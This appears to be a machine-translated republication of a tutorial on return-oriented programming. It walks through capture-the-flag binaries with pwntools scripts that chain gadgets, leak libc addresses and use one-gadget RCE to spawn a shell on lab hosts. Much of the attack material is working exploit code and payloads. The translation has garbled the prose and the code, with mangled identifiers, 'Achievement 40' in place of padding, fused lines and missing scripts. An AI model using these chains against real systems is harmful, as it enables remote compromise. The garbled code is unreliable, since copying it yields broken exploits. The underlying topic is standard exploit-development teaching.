What is ROP technology? 07/09 Update SLTechnology News&Howtos

What is ROP technology?

2025-07-09 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Network Security >

Shulou(Shulou.com)05/31 Report--

What is ROP technology, I believe that many inexperienced people are at a loss about it. Therefore, this paper summarizes the causes and solutions of the problem. Through this article, I hope you can solve this problem.

0x00 background

Obviously, if a page of memory does not have a writable (W) attribute, we cannot write code to it, and if there is no executable (X) attribute, the shellcode written to the memory page cannot be executed. The experiment on this feature will not be carried out here, you can try to modify the parameters of functions such as EIP and read () / scanf () / gets () while debugging to observe the results of the operation with no corresponding attribute memory. So how do we see if there are RWX memory pages in an ELF file? First of all, we can use IDA's shortcut Ctrl + S in static analysis and debugging.

Or, using the same method in the previous tutorial, use the checksec command that comes with pwntools to check whether the program has a RWX segment. Of course, because the program may call mprotect (), mmap () and other functions to dynamically modify or allocate memory pages with RWX attributes, the above methods may have errors.

Since attackers can think of writing shellcode and executing it in RWX segment memory pages, so can defenders, so a technique called NX bit (No eXecute bit) has emerged. This is a security technology implemented on CPU, and this bit classifies memory pages in both data and instructions. Data on memory pages marked as data pages (such as stacks and heaps) cannot be executed as instructions, that is, there is no X attribute. Because of the use of this protection, it is clear that the previous way of writing shellcode execution directly to memory has no effect. Therefore, we need to learn a famous bypass technique-ROP (Return-Oriented Programming, return oriented programming).

As the name implies, ROP is a technique for connecting code using the return instruction ret (similarly, you can also use a series of jmp instructions and call instructions, sometimes corresponding to JOP/COP). There must be functions in a program, and if there are functions, there will be ret instructions. We know that the essence of the ret instruction is pop eip, which redirects the contents at the top of the current stack as the memory address. ROP uses stack overflow to arrange a series of memory addresses on the stack, and each memory address corresponds to a gadget, that is, a small piece of assembly instructions ending with instructions such as ret/jmp/call, to perform a function through one jump after another. Because these assembly instructions already exist in the instruction area and can certainly be executed, and what we write on the stack is only the memory address, which belongs to data, so this method can effectively bypass NX protection.

0x01 uses ROP to call functions in the got table

First, let's look at a simple ROP under x86. Here we will demonstrate how to call a function that exists in the got table and control its parameters. Let's open ~ / RedHat 2017-pwn1/pwn1. It is obvious that there is a stack overflow for the main function:

The first address of the variable v1 is at bp-28h, that is, the variable is on the stack, and the _ _ isoc99_scanf used by the input does not limit the length, so our long input will cause a stack overflow.

The program has NX protection turned on, so obviously we can't open a shell with shellcode. Based on the ideas of the previous article, it is easy to think of calling the system function to execute system ("/ bin/sh"). So where can we find system and "/ bin/sh"?

First, we know that if dynamically linked programs import library functions, we can find the corresponding items in the GOT table and the PLT table (we will explain in more detail in a later article). Jumping to the .got.plt section, we found that the system function was imported into the program.

After solving the first problem, we need to consider the second problem. Through the search of the program, we did not find the string "/ bin/sh", but there is _ _ isoc99_scanf in the program, and we can call this function to read the "/ bin/sh" string into the process memory. Let's start building the ROP chain.

First, let's consider where the "/ bin/sh" string should be placed. By pressing the Ctrl+S shortcut to view the memory segments of the program while debugging, we see that 0x0804a030 begins to have a readable and writable address greater than 8 bytes, and that address is not affected by ASLR, so we can consider reading the string here. Next we find another parameter's'of _ _ isoc99_scanf, which is located in 0x08048629

Then we use the function of pwntools to get the address of _ _ isoc99_scanf in the PLT table. There is a stub code in the PLT table. If EIP is hijacked into the PLT entry of a function, we can call the function directly. We know that for x86 applications, the parameters enter the stack from right to left. So now we can build a ROP chain.

`from pwn import *

Context.update (arch = 'i386, os =' linux', timeout = 1)

Io = remote ('172.17.0.3, 10001)

Elf = ELF ('. / pwn1')

Scanf_addr = p32 (elf.symbols ['_ isoc99_scanf'])

Format_s = p32 (0x08048629)

Binsh_addr = p32 (0x0804a030)

Shellcode1 = 'A'*0x34

Shellcode1 + = scanf_addr

Shellcode1 + = format_s

Shellcode1 + = binsh_addr

Print io.read ()

Io.sendline (shellcode1)

Io.sendline ("/ bin/sh") Let's test it. Through debugging, we can see that when EIP points to retn, the data on the stack is the same as we expected, and the top of the stack is the first address of _ _ isoc99_scanf in the plt table, followed by two parameters. ! [] (data/attachment/album/201807/06/113538drglfgfgrrlmrtry.png) We continued to follow up on execution, and after executing in libc for a while, we received an error! [] (data/attachment/album/201807/06/113544p5333t7qe797qgbt.png) Why? Let's review the previous content. We know that the call instruction will push the next instruction address of the call instruction into the stack, and when the function called by call is finished, the ret instruction will take out the address pushed into the stack by the call instruction and transmit it to EIP. But here we call _ _ isoc99_scanf directly, bypassing call, without pressing an address into the stack like the call instruction. At this point, the function thinks that the return address is the format_s immediately following scanf_addr, and the first parameter becomes binsh_ addr`.

The case of call calling a function

08048557 mov [esp+4], eax0804855B mov dword ptr [esp], offset unk_8048629 08048562 call _ isoc99_scanf 08048567 lea eax, [esp+18h]

From the comparison of the two call methods, we can see that due to the lack of stack pressing operation of call instructions, if we do not simulate an address pushed into the stack, the parameters taken by the called function will be misplaced. So we need to improve the ROP chain. According to the above description, we should place a finished return address between the parameter and the saved EIP. Since we have to call the system function after we call scanf to read the string, we let _ _ isoc99_scanf return to the beginning of the main function again after execution, so that the stack overflow can be executed again. The improved ROP chain is as follows: we debugged again and found that this time we successfully called _ _ isoc99_scanf to read the "/ bin/sh" string to the address 0x0804a030

At this point, the program starts execution again from the main function. Because the state of the stack has changed, we need to recalculate the number of bytes overflowed. Then use the ROP chain to call system to execute system ("/ bin/sh") again, this ROP chain can be written in imitation of the previous one, and the complete script can also be found in the corresponding folder, which is not discussed here.

Next, let's look at how to use ROP to call functions in the got table under 64-bit. When we open the file ~ / bugs bunny ctf 2017-pwn150/pwn150, we can easily find that the overflow appears in Hello (). As in the previous example, because the program turns on NX protection, we have to find the system function and the "/ bin/sh" string. The program calls a self-defined function called today in the main function and executes system ("/ bin/date"), then the system function has it. As for the "/ bin/sh" string, although it is not in the program, we have found the "sh" string, which can also be used to open shell.

OK, now that we have the stack overflow point, the system function, and the string "sh", we can try to open shell. First of all, we have to solve the problem of passing parameters. Unlike x86, under x64, parameters are usually placed from left to right in rdi, rsi, rdx, rcx, R8, R9, and the extra parameters will be added to the stack (depending on the calling convention, it may be different, usually), so we need a way to assign values to RDI. Because we can control the stack, according to ROP, what we need to find is pop rdi; ret, with the first half for assigning rdi and the second half for skipping to other code snippets.

There are many tools that can help us find ROPgadget, such as the ROP class that comes with pwntools, ROPgadget, rp++, ropeme, and so on. I am using ROPgadget (https://github.com/JonathanSalwan/ROPgadget) here.

Specify the binaries through ROPgadget-- binary, and use grep to look for the desired fragments in all the output gadgets. Here is a small trick. First, let's take a look at the content of this address in IDA. We can find that there is no 0x400883 address, 0x400882 is pop R15, and then there is 0x400884's retn, so could this pop rdi be because ROPgadget has bug? Don't worry, we choose 0x400882 and press the shortcut key D to convert to data. Then select 0x400883 and press C to convert to code.

We can see that pop rdi is actually a "part" of pop R15. This also verifies once again that assembly instructions are just aliases for a string of data that can be parsed into legitimate opcode. As long as the corresponding data is executable in memory and can be converted to a legitimate opcode, there will be no problem with jumping over.

Now that we have everything in place, we can start building the ROP chain. This time we call the call system instruction directly, eliminating the need to manually add the return address to the stack. The script is as follows: debug and find that shell is successful. Retn jumps to gadget:pop rdi; retpop rdi at 0x400883 to assign the address 0x4003ef where the "sh" string is located to rdi

Retn jumps to call system

0x02 uses ROP to call int 80h/syscall

In the previous section, we came across one of the simplest scenarios of using ROP. But the reality is that in many cases the target program will not import the system function. In this case, we need to achieve our goal in other ways. The first thing we learn in this section is to call int 80h/syscall through ROP

With regard to int 80h/syscall, which was introduced in the "system calls" section of the previous article, let's look at the example ~ / Tamu CTF 2018-pwn5/pwn5. The main function of this program is implemented in print_beginning (). This function has a large number of puts () and printf () output prompts, asking us to enter three strings first_name, last_name, and major into three global variables, and then choose whether or not to join Corps of Cadets. Regardless of whether or not you choose to enter a similar function, we can see that only option 2 will call the function change_major (), and the other options will just print out something. After entering change_major (), we found a stack overflow: after finding the overflow point, we can start to figure out how to getshell. As I said at the beginning, the system function is not found in this program. But we used ROPGadget-- binary pwn5 | grep "int 0x80" to find an available gadget to review the previous article. We know that we can find a sys_execve call on http://syscalls.kernelgrok.com/, which can also be used to open shell. This system call needs to set five registers, where eax = 11 = 0xb, ebx = & ("/ bin/sh"), ecx = edx = edi = 0. "/ bin/sh" we can enter it into a global variable with a fixed address earlier. Next we're going to search for pop eax/ebx/ecx/edx/esi; ret through ROPgadget. Pop eax; pop ebx; pop esi; pop edi; retpop edx; pop ecx; pop ebx; ret builds the ROP chain and script as follows: debugging found that the execution failed, and the ROP chain was not read in.

Why is that?

After we output the payload, we find that there are two 0x0a in the 0x080150a, that is, "\ n" when typing, we will use the enter key "\ n" to represent the end of the input. Obviously, this side is also affected by this control character, so we need to re-select the gadgets. We replaced the gadget with this modified script and found that the getshell was successful.

0x03 looks for gadget from a given libc

Sometimes the pwn title also provides a corresponding version of libc in the pwn environment. In this case, we can get the address of system and "/ bin/sh" and call it by leaking the actual address of something in libc in memory and calculating the offset. The example of this section is ~ / Security Fest CTF 2016-tvstation/tvstation. This is a relatively simple topic, in addition to the three options shown in the title, there is a hidden option 4, option 4 will directly print out the first address of the system function in memory: from IDA, we can see that after printing the address, we have executed the function debug_func (). After entering the function debug_func (), we found the overflow point due to the problem given to libc, and we have leaked the memory address of system. Use the command readelf-a to view libc.so.6_x64

From this picture, we can see that the .textsection (Section) belongs to the first LOAD section (Segment). The file length of this section is the same as the memory length, that is, all the code is mapped to memory as is, and the relative offset between the code will not change. Because the previous PHDR and INTERP segments are also mapped as is, the system header address offset from the file header seen in IDA is the same as the runtime offset. Such as:

In this libc, the first address of the system function is 0x456a0, that is, the number of bytes from the beginning of the file 0x456a0 to the system function

Debug the program and find that the address of system in memory is 0x7fb5c8c266a00x7fb5c8c266a0-0x456a0 = 0x7fb5c8be1000 ‬

According to this fact, we can get the first address of libc loaded in memory through the leaked function address in libc, so as to jump to the first address of other functions and execute.

There is the string "/ bin/sh" in libc, which is located in the .data section. According to the same principle, we can also know the offset of this string from the first address of libc.

There is also gadget: pop rdi; ret for passing parameters. Based on this, we can build the script as follows

#! / usr/bin/python#coding:utf-8from pwn import * io = remote ('172.17.0.2, 10001) io.recvuntil (":") io.sendline (' 4') # Jump to the hidden option io.recvuntil ("@ 0x") system_addr = int (io.recv (12) 16) # read the address of the output system function in memory libc_start = system_addr-0x456a0 # calculate the first address of libc in memory pop_rdi_addr = libc_start + 0x1fd7a # pop rdi based on the offset The address of ret in memory, passing the system function the in-memory address of the string binsh_addr = libc_start + 0x18ac40 # "/ bin/sh" payload = "" payload + = 'Achievement 40 # paddingpayload + = p64 (pop_rdi_addr) # pop rdi " Retpayload + = p64 (binsh_addr) # system function parameter payload + = p64 (system_addr) # call system () to execute system ("/ bin/sh") io.sendline (payload) io.interactive () 0x04 some special gadgets

This section focuses on two special gadgets. The first gadget, often referred to as generic gadgets, is usually located in _ _ libc_csu_init in x64 ELF programs, as shown in the following figure: this picture contains two gadget, namely

We know that parameters are passed to functions in x64 ELF programs, usually in the order of rdi, rsi, rdx, rcx, R8, R9, stack. In the above three segments of gadgets, the first paragraph can set r12-r15, then the third paragraph can use the already set register to set rdi, then the second paragraph can set rsi, rdx, rbx, and finally use r12+rbx*8 to call any address. When you have trouble finding gadgets, you can use this gadgets to quickly construct a ROP chain. It should be noted that when using Universal gadgets, you need to set rbp=1, because call qword ptr [r12+rbx*8] is followed by add rbx, 1; cmp rbx, rbp; jnz xxxxxx. Because we usually make rbx=0, which makes r12+rbx*8 = R12, rbx is bound to become 1 after the end of the call instruction. At this time, rbp! = 1 JNZ will call again, which may cause segment errors. So how do you use this gadgets? Let's take a look at the example ~ / LCTF 2016-pwn100/pwn100

This example provides libc, the overflow point is obvious, at 0x40063d, all we need to do is disclose the address of a function in the got table, and then calculate the offset to call system. The previous code is very simple, so we won't introduce it.

#! / usr/bin/python#coding:utf-8from pwn import * io = remote ("172.17.0.3", 10001) elf = ELF (". / pwn100") puts_addr = elf.plt ['puts'] read_got = elf.got [' read'] start_addr = 0x400550pop_rdi = 0x400763universal_gadget1 = 0x40075a # Universal gadget1:pop rbx; pop rbp; pop R12; pop R13; pop R14; pop R15; retnuniversal_gadget2 = 0x400740 # Universal gadget2:mov rdx, R13; mov rsi, R14 Mov edi, r15d Call qword ptr [r12+rbx*8] binsh_addr = 0x60107c # bss put the FILE structure of STDIN and STDOUT, and modification will cause the program to crash payload = "A" * 72 # paddingpayload + = p64 (pop_rdi) # payload + = p64 (read_got) payload + = p64 (puts_addr) payload + = p64 (start_addr) # Jump to start Restore stack payload = payload.ljust # paddingio.send (payload) io.recvuntil ('bye~\ n') read_addr = U64 (io.recv () [:-1] .ljust (8,'\ x00') log.info ("read_addr =% # x", read_addr) system_addr = read_addr-0xb31e0log.info ("system_addr =% # x", system_addr)

To demonstrate the use of universal gadgets, we chose to read the / bin/sh\ x00 string again by calling the read function, rather than using the offset directly. First of all, we set up the stack according to the universal gadgets.

Payload = "A" * 72 # paddingpayload + = p64 (universal_gadget1) # Universal gadget1payload + = p64 (0) # rbx = 0payload + = p64 (1) # rbp = 1. Judge payload + = p64 (read_got) # R12 = the read function item in the got table after the return of the call of the later universal gadget2, which is the real address of the read function. Directly through the call call payload + = p64 (8) # R13 = 8 bytes read function read, universal gadget2 assignment to rdxpayload + = p64 (binsh_addr) # R14 = read function read / bin/sh saved address, universal gadget2 assignment to rsipayload + = p64 (0) # R15 = 0Magnum read function parameter fd, namely STDIN Universal gadget2 assigned to edipayload + = p64 (universal_gadget2) # Universal gadget2

Should we connect the return address directly after the payload? No, let's look back at the implementation process of universal_gadget2.

Because of our construction, the above code will be executed only once, and then the process will jump to the following loc_400756, this series of operations will lift a total of 56 bytes of stack space, so we also need to provide 56 bytes of garbage data to fill, and then splice the address to be redirected by retn.

Payload + ='\ x00 universal 56 # universal gadget2 is followed by a judgment statement, followed by a universal gadget1, which is used to populate the stack payload + = p64 (start_addr) # jump to start Recovery stack payload = payload.ljust (200, "B") # padding followed by the regular operation getshellio.send (payload) io.recvuntil ('bye~\ n') io.send ("/ bin/sh\ x00") # A piece of payload above called the read function to read "/ bin/sh\ x00" Send the string payload = "A" * 72 # paddingpayload + = p64 (pop_rdi) # to the system function payload + = p64 (binsh_addr) # rdi = & ("/ bin/sh\ x00") payload + = p64 (system_addr) # call the system function to execute system ("/ bin/sh") payload = payload.ljust (B) # paddingio.send (payload) io.interactive ()

The second gadget we introduce is often referred to as one gadget RCE, and as the name implies, code is executed remotely through a gadget, or getshell. Let's demonstrate the power of this gadget through an example ~ / TJCTF 2016-oneshot/oneshot.

To take advantage of this gadget, we need a libc for the corresponding environment and a tool one_gadget (https://github.com/david942j/one_gadget). This program has no stack overflow, and its code is very simple.

From the code in the red box, we see that the address rbp+var_8 is assigned to rsi as the second parameter of _ _ isoc99_scanf, that is, the input is saved here. The content in rbp+var_8 is then assigned to rax, then to rdx, and finally executed through call rdx. In other words, we enter a number that will be called using call as the address. Since we can only control 4 bytes, we need to use one gadget RCE to getshell. We found some gadget through one_gadget: we see that these gadget have constraints. We choose the first one, which requires rax=0. We build the script for debugging:

#! / usr/bin/python#coding:utf-8from pwn import * one_gadget_rce = 0x45526#one_gadget libc.so.6_x64#0x45526 execve ("/ bin/sh", rsp+0x30, environ) # constraints:# rax = = NULLsetbuf_addr = 0x77f50 setbuf_got = 0x600ae0io = remote ("172.17.0.2", 10001) io.sendline (str (setbuf_got)) io.recvuntil ("Value:") setbuf_memory_addr = int (io.recv () [: 18] 16) # revealing the first address of setbuf in memory io.sendline (str (setbuf_memory_addr-(setbuf_addr-one_gadget_rce) by printing the contents of setbuf entry in got table # calculating the address of one_gadget_rce in memory by offset io.interactive ()

Rax = 0 when executing to call rdx

Getshell succeeded

After reading the above, have you mastered the method of ROP technology? If you want to learn more skills or want to know more about it, you are welcome to follow the industry information channel, thank you for reading!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.

*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.